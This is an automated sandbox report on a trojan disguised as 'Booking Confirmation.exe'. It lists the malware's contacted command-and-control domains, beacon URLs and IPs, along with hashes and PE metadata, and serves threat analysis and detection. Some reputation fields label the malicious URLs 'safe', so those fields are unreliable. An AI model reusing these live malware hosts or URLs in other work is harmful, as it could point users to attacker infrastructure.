            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            www.evolvekitchendesign.com/ffw/0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.tiro.comym0%Avira URL Cloudsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.carterandcone.como.0%URL Reputationsafe
            http://www.carterandcone.como.0%URL Reputationsafe
            http://www.carterandcone.como.0%URL Reputationsafe
            http://www.sajatypeworks.come0%URL Reputationsafe
            http://www.sajatypeworks.come0%URL Reputationsafe
            http://www.sajatypeworks.come0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.praktijkinfinity.online/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.localmoversuae.com
            156.227.187.201
            truetrue
              unknown
              www.praktijkinfinity.online
              185.175.200.247
              truetrue
                unknown
                buehne.cloud
                81.169.149.11
                truetrue
                  unknown
                  merzigomusic.com
                  34.102.136.180
                  truetrue
                    unknown
                    www.buehne.cloud
                    unknown
                    unknowntrue
                      unknown
                      www.merzigomusic.com
                      unknown
                      unknowntrue
                        unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hvtrue
                        • Avira URL Cloud: safe
                        unknown
                        www.evolvekitchendesign.com/ffw/true
                        • Avira URL Cloud: safe
                        low
                        http://www.praktijkinfinity.online/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hvtrue
                        • Avira URL Cloud: safe
                        unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                          high
                          http://www.fontbureau.comBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comtBooking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://www.sajatypeworks.comsBooking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers?Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.tiro.comexplorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designersexplorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.goodfont.co.krBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssBooking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmpfalse
                                      high
                                      http://en.wBooking Confirmation.exe, 00000000.00000003.650111317.0000000005725000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.carterandcone.comlBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnEBooking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.sajatypeworks.comBooking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cn/Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.652187363.0000000005726000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.founder.com.cn/cnhtBooking Confirmation.exe, 00000000.00000003.651858652.000000000572E000.00000004.00000001.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.typography.netDBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://www.fontbureau.com/designers/cabarga.htmlNBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.founder.com.cn/cn/cTheBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/staff/dennis.htmBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://fontfabrik.comBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.founder.com.cn/cnBooking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.651977805.0000000005727000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers/frere-user.htmlBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.jiyu-kobo.co.jp/Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.galapagosdesign.com/DPleaseBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.com/designers8Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.%s.comPAexplorer.exe, 00000006.00000002.914045803.0000000002B50000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            low
                                            http://www.tiro.comymBooking Confirmation.exe, 00000000.00000003.651298106.000000000573B000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fonts.comBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.sandoll.co.krBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.urwpp.deDPleaseBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.zhongyicts.com.cnBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.carterandcone.como.Booking Confirmation.exe, 00000000.00000003.653249672.0000000005728000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sajatypeworks.comeBooking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://www.sakkal.comBooking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              81.169.149.11
                                              unknownGermany
                                              6724STRATOSTRATOAGDEtrue
                                              156.227.187.201
                                              unknownSeychelles
                                              132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                              185.175.200.247
                                              unknownNetherlands
                                              48635ASTRALUSNLtrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:356529
                                              Start date:23.02.2021
                                              Start time:09:35:52
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 13s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:Booking Confirmation.exe
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@9/1@4/3
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 15.7% (good quality ratio 13.9%)
                                              • Quality average: 71.4%
                                              • Quality standard deviation: 32%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .exe
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                              • Excluded IPs from analysis (whitelisted): 104.43.139.144, 51.104.139.180, 52.255.188.83, 104.42.151.234, 92.122.145.220, 40.88.32.150, 52.147.198.201, 13.64.90.137, 93.184.221.240, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.11.168.160
                                              • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/356529/sample/Booking Confirmation.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              09:36:48API Interceptor1x Sleep call for process: Booking Confirmation.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              POWERLINE-AS-APPOWERLINEDATACENTERHKlpdKSOB78u.exeGet hashmaliciousBrowse
                                              • 154.213.108.250
                                              4pFzkB6ePK.exeGet hashmaliciousBrowse
                                              • 154.201.205.155
                                              NewOrder.xlsmGet hashmaliciousBrowse
                                              • 154.201.205.155
                                              Order83930.exeGet hashmaliciousBrowse
                                              • 154.215.106.100
                                              RFQ for Marjan Development Program.exeGet hashmaliciousBrowse
                                              • 154.86.32.52
                                              ForeignRemittance_20210219_USD.xlsxGet hashmaliciousBrowse
                                              • 156.227.188.203
                                              SHED.EXEGet hashmaliciousBrowse
                                              • 154.213.100.41
                                              wFzMy6hehS.exeGet hashmaliciousBrowse
                                              • 192.151.233.118
                                              INCHAP_Invoice_21.xlsxGet hashmaliciousBrowse
                                              • 192.151.233.118
                                              ffOWE185KP.exeGet hashmaliciousBrowse
                                              • 192.151.233.118
                                              mWxzYlRCUi.exeGet hashmaliciousBrowse
                                              • 192.151.233.118
                                              Cargo_remitP170201.xlsxGet hashmaliciousBrowse
                                              • 192.151.233.118
                                              quotations pdf.exeGet hashmaliciousBrowse
                                              • 156.243.221.75
                                              Project.pdf.exeGet hashmaliciousBrowse
                                              • 154.213.241.19
                                              order pdf.exeGet hashmaliciousBrowse
                                              • 156.252.99.134
                                              YCVj3q7r5e.exeGet hashmaliciousBrowse
                                              • 192.151.255.12
                                              th520.exeGet hashmaliciousBrowse
                                              • 103.75.46.74
                                              DHL Parcel Details.xlsxGet hashmaliciousBrowse
                                              • 154.216.241.144
                                              DCSGROUP.xlsxGet hashmaliciousBrowse
                                              • 160.124.66.18
                                              purchase order doc.exeGet hashmaliciousBrowse
                                              • 154.201.177.118
                                              STRATOSTRATOAGDEPO 20211602.xlsmGet hashmaliciousBrowse
                                              • 81.169.145.88
                                              ZRz0Aq1Rf0.dllGet hashmaliciousBrowse
                                              • 81.169.181.88
                                              Io8ic2291n.docGet hashmaliciousBrowse
                                              • 85.214.26.7
                                              gSvUGC0OzV.exeGet hashmaliciousBrowse
                                              • 81.169.145.90
                                              DHL Documents_AWB_001173980920AD.xlsxGet hashmaliciousBrowse
                                              • 81.169.145.143
                                              nzGUqSK11D.exeGet hashmaliciousBrowse
                                              • 85.214.228.140
                                              FastClient_i_r756196528.exeGet hashmaliciousBrowse
                                              • 85.214.219.2
                                              PO210121.exeGet hashmaliciousBrowse
                                              • 81.169.145.90
                                              _RFQ_MVSEASAIL_34.xlsxGet hashmaliciousBrowse
                                              • 81.169.145.68
                                              0iEsxw3D7A.exeGet hashmaliciousBrowse
                                              • 81.169.145.143
                                              2021_50SG0BK00T1,pdf.exeGet hashmaliciousBrowse
                                              • 81.169.145.150
                                              6gg4UwrN3I.exeGet hashmaliciousBrowse
                                              • 81.169.145.82
                                              RFV9099311042.exeGet hashmaliciousBrowse
                                              • 81.169.145.64
                                              MR727043761.docGet hashmaliciousBrowse
                                              • 81.169.145.175
                                              SecuriteInfo.com.VB.Trojan.Downloader.JVAZ.20129.docGet hashmaliciousBrowse
                                              • 81.169.145.175
                                              SecuriteInfo.com.Mal.DocDl-K.8726.docGet hashmaliciousBrowse
                                              • 81.169.145.175
                                              LX0950180213.docGet hashmaliciousBrowse
                                              • 81.169.145.175
                                              5j6RsnL8zx.exeGet hashmaliciousBrowse
                                              • 81.169.145.143
                                              099898892.exeGet hashmaliciousBrowse
                                              • 81.169.145.74
                                              H56P7iDwnJ.docGet hashmaliciousBrowse
                                              • 81.169.145.152

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Booking Confirmation.exe.log
                                              Process:C:\Users\user\Desktop\Booking Confirmation.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1406
                                              Entropy (8bit):5.341099307467139
                                              Encrypted:false
                                              SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
                                              MD5:E5FA1A53BA6D70E18192AF6AF7CFDBFA
                                              SHA1:1C076481F11366751B8DA795C98A54DE8D1D82D5
                                              SHA-256:1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
                                              SHA-512:77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
                                              Malicious:true
                                              Reputation:moderate, very likely benign file
                                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.457054361780353
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:Booking Confirmation.exe
                                              File size:510976
                                              MD5:78d9eadc9fcc580239b360ffa2c2220f
                                              SHA1:2bc313ca573a9be005aa8d22e96601c10dcd5041
                                              SHA256:e836c2aecd7a2ae83a5bb088780d9e7b8cd6c3a7ff6b9c3f1261bfd1f53dbef7
                                              SHA512:60858a1b0c966c7e2bbc5b4a86ca0023da5d4bf8d68331c8290e9a57d97e14e5c50d26bca22461301bdcbdd48ac85b2652fb0545931a43ebe0a497dd115a5c3d
                                              SSDEEP:12288:guB7EQbDmPXvcNGIdjKD8WMxSNyPww1rqGGRzacQA+xE6:r7EQOPQdW85yyx1eRLQLT
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G4`..............P.................. ........@.. ....................... ............@................................

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x47d6ee
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x60344790 [Tue Feb 23 00:08:48 2021 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x7d69c0x4f.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7e0000xff8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x7b6f40x7b800False0.765528134489data7.4686220922IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rsrc0x7e0000xff80x1000False0.40234375data5.00072933657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x800000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_VERSION0x7e0900x344data
                                              RT_MANIFEST0x7e3e40xc0fXML 1.0 document, UTF-8 Unicode (with BOM) text

